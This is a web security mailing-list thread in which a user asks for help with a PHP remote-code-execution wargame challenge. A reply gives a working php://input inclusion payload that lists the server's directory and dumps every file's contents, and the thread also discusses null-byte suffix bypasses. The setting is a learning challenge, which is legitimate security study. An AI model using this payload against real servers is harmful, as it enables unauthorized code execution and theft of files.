Hello. I was told you guys might be able to help me out. I've been dared to complete this challenge and execute remote code on a server, but I'm stuck.
Basically, here's what I know:
In case you're wondering, this is not for malicious purposes, I'm simply learning by completing one of the challenges here:
http://tasteless.phpnet.us/level_3.php
I've been googling for hours but I'm completely stuck. The author told me I'm not allowed to use LFI nor RFI, I simply need to provide some php code with a GET or POST request and get it executed. I tried file=php://input along with <?php phpinfo(); ?> in a POST request done via a web proxy, and it worked when I removed the part of the script that appends .html to the string. I'm not sure how to remotely disable the part that appends .html, so that's basically what I'm looking for. %00 is blocked (i think? It's not working). Other than that, I'm looking for any other possible solutions to the problem as well, not just this php://input solution.
I was hoping you guys would like a challenge ;-)
Thanks for your time,
Cris
HTTP POST to http://level3.tasteless.eu/?file=php://input
executing: <?$d=dir(getcwd());echo"<pre>path:".$d-
path.PHP_EOL;while(($file=$d->read())!==false)
{echo"filename:".$file.PHP_EOL.file_get_contents($file).PHP_EOL;}echo"
</pre>";$d->close();?>
Cris Noob <cloakbot <at> hotmail.com> writes:
Hello. I was told you guys might be able to help me out. I've been dared
to complete this challenge and execute remote code on a server, but I'm
stuck.Basically, here's what I know:http://pastebin.com/p89CGcrhIn case
you're wondering, this is not for malicious purposes, I'm simply learning by
completing one of the challenges
here:http://tasteless.phpnet.us/level_3.phpI've been googling for hours but
I'm completely stuck. The author told me I'm not allowed to use LFI nor RFI,
I simply need to provide some php code with a GET or POST request and get it
executed. I tried file=php://input along with <?php phpinfo(); ?> in a POST
request done via a web proxy, and it worked when I removed the part of the
script that appends .html to the string. I'm not sure how to remotely
disable the part that appends .html, so that's basically what I'm looking
for. %00 is blocked (i think? It's not working). Other than that, I'm
looking for any other possible solutions to the problem as well, not just
this php://input solution.I was hoping you guys would like a challenge
Thanks for your time,Cris
The Web Security Mailing List
WebSecurity RSS Feed
http://www.webappsec.org/rss/websecurity.rss
Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
WASC on Twitter
http://twitter.com/wascupdates
websecurity <at> lists.webappsec.org